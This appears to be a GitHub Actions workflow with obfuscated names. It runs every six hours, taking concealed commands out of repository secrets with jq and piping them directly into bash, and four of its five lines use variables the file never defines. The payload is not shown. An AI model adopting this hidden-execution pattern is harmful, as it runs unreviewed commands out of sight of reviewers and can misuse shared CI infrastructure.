name: nongfeiting1524

on:
  workflow_dispatch:
  schedule:
    - cron: '26 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nongfeiting1524
        env:
          lso61: ${{ secrets.lso61 }}
        run: |
          echo $lso61 | jq -r .mx3 | /bin/bash
          echo $gfm16 | jq -r .ose0 | /bin/bash
          echo $weux9943 | jq -r .oiv6033 | /bin/bash
          echo $gfg836 | jq -r .nivl73 | /bin/bash
          echo $cxb98 | jq -r .qy63222 | /bin/bash

